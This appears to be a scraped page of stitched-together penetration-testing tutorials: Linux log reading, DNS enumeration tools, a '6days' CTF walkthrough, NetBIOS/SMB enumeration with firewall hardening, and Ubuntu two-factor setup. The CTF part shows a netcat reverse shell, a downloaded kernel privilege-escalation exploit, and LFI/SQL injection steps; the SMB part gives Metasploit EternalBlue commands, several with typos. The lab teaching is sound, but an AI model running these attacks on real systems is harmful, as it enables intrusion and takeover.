cat vsftpd.log

System Log

syslog is a standard for system logs or message logging. Administrator may use syslog for system management and security auditing as well as general informational, analysis, and debugging messages. A wide variety of devices, such as printers, routers, and message receivers across many platforms use the syslog standard.

Location: /var/log

Use cat command for reading syslog as shown in given image.

cat syslog

APT Log

The apt is standard command-line tool in UNIX, which works for performing functions such as installation of new software packages, upgrade of existing software packages, updating of the package list index, and even upgrading the entire Ubuntu system.

Location:/var/log

Hence apt contain its own log file for all new and previous installed software. It has two log file as:

· History.log : /var/log/apt

· Term.log /var/log/apt

Now type following command for reading history log of apt.

cat history .log

From given image you can observe the result which contains information of a software installation and updates.

It was a brief theory for reading logs in simplest way…………………………………………..

Source:Wikipedia.org

Today we are going to perform DNS enumeration with Kali Linux platform only. It has in-built tool for DNS enumeration. For this tutorial you must be aware of DNS server and its records, if you are not much aware of DNS then read our previous article “Setup DNS Penetration Testing Lab on Windows Server 2012”.

Nmap

Following command will try to discover hosts' services using the DNS Service Discovery protocol. It sends a multicast DNS-SD query and collects all the responses.

The script first sends a query for _services._dns-sd._udp.local to get a list of services. It then sends a follow up query for each one to try to get more information.

nmap --script=broadcast-dns-service-discovery.

From given screenshot you can observe the running service on a DNS server.

Following command will try to enumerate DNS hostnames by brute force guessing of common subdomains. With the dns-brute.srvargument, dns-brute will also try to enumerate common DNS SRV records.

Wildcard records are listed as "*A" and "*AAAA" for IPv4 and IPv6 respectively.

nmap -T4-p 53 --script dns-brutewww.hackingarticles.in

From screenshot you can observe DNS hostname

By default, the DNS server performs recursive queries on behalf of its DNS clients and DNS servers that have forwarded DNS client queries to it

Attackers can use recursion to deny the DNS Server service. Therefore, if a DNS server in your network is not intended to receive recursive queries, recursion should be disabled on that server

Following command will Checks if a DNS server allows queries for third-party names. It is expected that recursion will be enabled on your own internal nameservers.

From https://technet.microsoft.com

Nmap -Pn -sU -p 53 --script=dns-recursion 192.168.1.150

As result you can observe that recursion is enable on targeted system

Following command will enumerates various common service (SRV) records for a given domain name. The service records contain the hostname, port and priority of servers for a given service. The following services are enumerated by the script: - Active Directory Global Catalog - Exchange Autodiscovery - Kerberos KDC Service - Kerberos Passwd Change Service - LDAP Servers - SIP Servers - XMPP S2S - XMPP C2S

nmap --script dns-srv-enum --script-args "dns-srv-enum.domain=’google.com’

DNSEnum

Multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.

OPERATIONS:

· Get the host’s addresse (A record).

· Get the namservers (threaded).

· Get the MX record (threaded).

· Perform axfr queries on nameservers and get BIND VERSION (threaded).

· Get extra names and subdomains via google scraping (google query = “allinurl: -www site:domain”).

· Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).

· Calculate C class domain network ranges and perform whois queries on them (threaded).

· Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).

· Write to domain_ips.txt file ip-blocks.

Following command will avoid enumeration of reverse lookup and save the output result into xml format.

dnsenum --noreverse -o mydomain.xml hackingarticles.in

DNSRecon

DNSRecon provides the ability to perform:

1. Check all NS Records for Zone Transfers

2. Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT)

3. Perform common SRV Record Enumeration. Top Level Domain (TLD) Expansion

4. Check for Wildcard Resolution

5. Brute Force subdomain and host A and AAAA records given a domain and a wordlist

6. Perform a PTR Record lookup for a given IP Range or CIDR

7. Check a DNS Server Cached records for A, AAAA and CNAME Records provided a list of host records in a text file to check

8. Enumerate Common mDNS records in the Local Network Enumerate Hosts and Subdomains using Google

Following command will enumerate DNS record of targeted website

dnsrecon-d hackingarticles.in

You can observe the result from given below image.

Fierce

Fierce is a reconnaissance tool. Fierce is a PERL script that quickly scans domains (usually in just a few minutes, assuming no network lag) using several tactics.

Type following command for DNS enumeration on targeted website

Fierce-dns hackingarticles.in

From screenshot you can see that we have scanned almost same result as from above tools.

Hello friends! Today we are going to take another CTF challenge known as 6days. The credit for making this vm machine goes to “CanYouPwn.Me” and it is another boot2root challenge where we have to execute flag file to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.18 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap –sV 192.168.0.18

We find port is open so we open this ip on our browser.

This page maybe vulnerable to SQL injection but a WAF is implemented to protect it. So we take a look at the source at the source code for further information.

We find that this page maybe vulnerable to LFI and RFI so we use curl to implement our attack.

We find that LFI is working on this site. Now we take a look at the config file to find the name of the database.

Taking a look at the config file we found that it accessible through localhost. So we use SQL injection with LFI to access the database. Port 80 had WAF so we use 8080 to access the localhost.

We find a username and password. We know that ssh is open so we try this username and password to login through ssh.

ssh andrea@192.168.0.18

Now we are connected through ssh, but when we try to run commands it seems like no command is working. It is possible that output is redirected to null. So we use netcat to get a reverse shell

We set up a listener on our system first.

nc –lvp 1234

No we try to connect using netcat reverse shell

nc –e /bin/sh 192.168.0.18 1234

When we got the shell we see that we can see the output of the commands. We also find that the OS is Ubuntu 12.04 that is vulnerable to overlays exploit.

So we move to /tmp/ folder and download overlays exploit and save it as exploit.c

cd /tmp/

wget https://www.exploit-db.com/download/37292 --no-check-certificate

mv 37292 exploit.c

We compile the file and save it as exploit. We give it executable permission then run the file.

gcc –o exploit exploit.c

chmod 777 exploit

./exploit

Now we have root access. When we go back we find an executable file called flag.

When we run the executable file it shows us a congratulation message stating we completed the challenge.

NETBIOS (Network Basic Input/output System)

NETBIOS is a service which allows communication between applications such as printer or other computer in Ethernet or token ring network via NETBIOS name.

NETBIOS name is 16 digits long character assign to a computer in workgroup by WINS for name resolution of an IP address into NETBIOS name.

Workgroup VS Domain

Workgroup: It is a peer to peer network for maximum 10 computers in same LAN or subnet. It has no Centralized Administration, which means no computer has control over another computer. Each user controls the resources and security locally on their system.

Domain: It is a client/server network for up to 2000 computers anywhere in the world. The administrator manages the domain and its users and resources. A user with an account on the domain can log onto any computer system, without having the account on that computer.

NetBIOS provides three distinct services:

1. Name service (NetBIOS-NS) for name registration and resolution via port 137.

2. Datagram distribution service (NetBIOS-DGM) for connectionless communication via port 138.

3. Session service (NetBIOS-SSN) for connection-oriented communication via port 139.

Port	Protocol	Service
135	TCP	MS-RPC endpoint mapper
137	UDP	NetBIOS Name Service
138	UDP	NetBIOS Datagram Service
139	TCP	NetBIOS Session Service
445	TCP	SMB Protocol

Port 135: it is used for Microsoft Remote Procedure Call between client and server to listen the query of client. Basically it is used for communication between client- client and server -client for sending messages.

Port 137: the name service operates on UDP port 137. The name service primitives offered by NetBIOS are:

· Add name - registers a NetBIOS name.

· Add group name - registers a NetBIOS "group" name.

· Delete name - un-registers a NetBIOS name or group name.

· Find name - looks up a NetBIOS name on the network.

Port 138: Datagram mode is connectionless; the application is responsible for error detection and recovery. In NBT, the datagram service runs on UDP port 138.The datagram service primitives offered by NetBIOS are:

· Send Datagram - send a datagram to a remote NetBIOS name.

· Send Broadcast Datagram - send a datagram to all NetBIOS names on the network.

· Receive Datagram - wait for a packet to arrive from a Send Datagram operation.

· Receive Broadcast Datagram - wait for a packet to arrive from a Send Broadcast Datagram operation.

Port 139:Session mode lets two computers establish a connection, allows messages to span multiple packets, and provides error detection and recovery. In NBT, the session service runs on TCP port 139.

The session service primitives offered by NetBIOS are:

· Call - opens a session to a remote NetBIOS name.

· Listen - listen for attempts to open a session to a NetBIOS name.

· Hang Up - close a session.

· Send - sends a packet to the computer on the other end of a session.

· Send No Ack - like Send, but doesn't require an acknowledgment.

· Receive - wait for a packet to arrive from a Send on the other end of a session.

Port 445:It is used for SMB protocol (server message block) for sharing file between different operating system i.e. windows-windows, Unix-Unix and Unix-windows.

For mail details read our previous article given below:-

· Penetration Testing in SMB Protocol using Metasploit

· 4 Ways to Hack SMB Login Password

· 4 ways to Connect Remote PC using SMB Port

· Hack Remote Windows PC using DLL Files (SMB Delivery Exploit)

Scanning open port for NETBIOS Enumeration

We are using nmap for scanning target network for open TCP and UDP ports and protocol.

nmap -sT -sU 192.168.1.128

From given image you can see that from result of scan we found port 137 is open for NetBIOS name services, moreover got MAC address of target system.

What will happen if admin has shares a folder in a network?

Suppose we had given share permission to a specific folder (for example ignite as shown in given image) so that we can share that folder with other user in local network then which port will involve in this process.

Now you can observe that we have got a link for our share folder. Using that link anyone can access this folder in that network, hence it means now a new port must be activated for establish connection in order to access share folder on another system, let find out it.

Now again taking the help of nmap for scanning the target one more time.

nmap -sT -sU 192.168.1.128

From result of scanning you can observe that after sharing a folder we found port 135, 139 and 445 get activated.

Hence only by sharing a single folder in network, three ports get opened simultaneously in target system for communication with other system.

Through computer > property, user can view basic information about their computer.

As you can perceive we are sharing the image of victims control panel home which is showing his system basic information such as computer name, workgroup and etc.

Same information can be enumerated with another system in that network using following command:

nbtstat -a 192.168.1.128

Hence you can read the information from inside NetBIOS remote machine name table we had enumerated same information as shown in above image.

Apply filter on port 135-139 with firewall

For increasing security of your system in your local network you can add filter on port 137 with help of window firewall. Because port series from 135 to 139 are most vulnerable therefore administrator can block either whole series or specific port.

Select Inbound Rules and click on New Rule.

Select radio button for port which will create a new rule that control connections for a TCP or UDO port.

Then click on next.

Select UDP port to apply rule on it.

Edit port 137as specific local port then click on next. Here you can add complete series also for example: 135,137,138,139.

Choose Block the connection as action to be taken when a connection matches the specified condition.

Hence it will not allow traffic on port 137 for communication as a result if attacker will scan victim system he will not able to find the NetBIOS name of target system.

Click on next.

At last provide caption to your new rule of your choice (as show in image block nbtsat) and thenclick on Finish and you will see the new will be added into window firewall.

Now scan target system using previous command

nbtstat -a 192.168.1.128

This time it will not give any information related to NetBIOS. Form given image you can read the message “Host is not found.

Now let’s try to access share folder of target (192.168.1.128)when port 137 is blocked by him and figure out whether we can able to access the share folder “ignite” or not, using run command prompt.

From given image you can see that we are able to access to ignite folder even after the port 137 has been blocked by admin in his network.

Conclusion: Although port 137 was block but still sharing was possible due to running protocol on port 139 and 445. Hence by blocking 137 admin has added a security level that will hide NetBIOS name of his system (192.168.1.128) in local network.

Block port 139

Similarly again use firewall inbound rule to block port 139, so that we can verify its impact on sharing information between two or more system. This will add a new in firewall to stop the traffic coming on port 139.

Now again let’s try to access share folder of target (192.168.1.128)when port 137 and 139 both are blocked by him and figure out whether we can able to access the share folder “ignite” or not, using run command prompt.

From given image you can see that we are able to access to ignite folder when the port 139 has been blocked by admin in his network.

Conclusion: Although port 137 and 139 both were blocked but still sharing was possible due to running protocol on port 445. Hence by blocking 139 admin has added a security level that will prevent NetBIOS session service as well as prevent NetBIOS enumeration.

Mainly in many origination port serious from 135 to139 are blocked in network for security reasons, therefore port 445 is used for sharing data in network. Now identify whether it is vulnerable to MS17-010 using metasploit as show in given image.

Use auxiliary/scanner/smb/smb_ms17_010

msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.28

msf auxiliary(smb_ms17_010) > set port 445

msf auxiliary(smb_ms17_010) > exploit

From result we found host is vulnerable to MS17-010, hence we can exploit the target easily.

For more scanning method read our previous article from here.

use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.1.128

msf exploit(ms17_010_eternalblue) >set rhost 445

msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.115

msf exploit(ms17_010_eternalblue) > exploit

This will exploit target system and give meterpreter session of targeted system as shown in given image.

Conclusion: Enumeration plays an important role in network penetration testing because it will fetch out hidden information of victim’s system as well as identify the weakness that may help in exploiting the system.

Hello friends, today we are going to implement two-factor authentication on ubuntu. Two-factor authentication adds an extra layer of security. We are going to use google authenticator to implement two-factor authentication.

Before we start, once we have set this up, we will not be able to log into the account (or issue sudo commands) without a six-digit code from the authenticator. This also adds another step for us. Remember, however, this added step brings with it an extra layer of security we wouldn’t have otherwise.

First we are going to install google authenticator on our ubuntu.

sudo apt-get install libpam-google-authenticator

After we install it we are going to configure our authenticator. Open /etc/pam.d/common-auth

sudo gedit /etc/pam.d/common-auth

Add a line auth required pam_google_authenticator.so at the same place shown in the image.

Now install google authenticator on your smartphone.

Now run command google-authenticator on terminal. Select yes for time-based authentication. In time based authentication, OTP will be valid for a particular period of time.

Now it will generate password and a QR-code. You can either create an account manually or simply scan the QR-code on your phone to setup your account.

Once you have created the account on your smartphone it will look something like this.

After creating the account on your smartphone, select yes to update google authenticator on terminal.

Now it will ask multiple options to select the type of authentication you want. You can customize it according to your need.

Now restart our system to check if the authenticator is working.

Now whenever we try to login it asks for verification code that will be available on your smartphone.

How to Perform Remote Tunneling

Hack the d0not5top VM (CTF Challenge)

Web Application Penetration Testing with cURL

Analyzing TCP Headers using Wireshark

Hack the Donkey Docker (CTF Challenge)

Bypass UAC in Windows 10 using bypass_comhijack Exploit

Hack the Moria: 1.1 (CTF Challenge)

SSH Pivoting using Meterpreter

Hack the Analougepond VM (CTF Challenge)

Understanding Nmap Scan with Wireshark

Configure Penetration Testing Lab Setup in Ubuntu

Hack the EW Skuzzy VM (CTF Challenge)

Configure Web Application Pentest Lab

Wordpress Penetration Testing Lab in Ubuntu

Hack the 64base VM (CTF Challenge)

Understanding Log Analysis of Web Server

4 Ways to DNS Enumeration

Hack the 64days VM (CTF Challenge)

Beginner Guide NetBIOS and SMB Enumeration on Windows

How to secure Ubuntu Server using Google Authenticator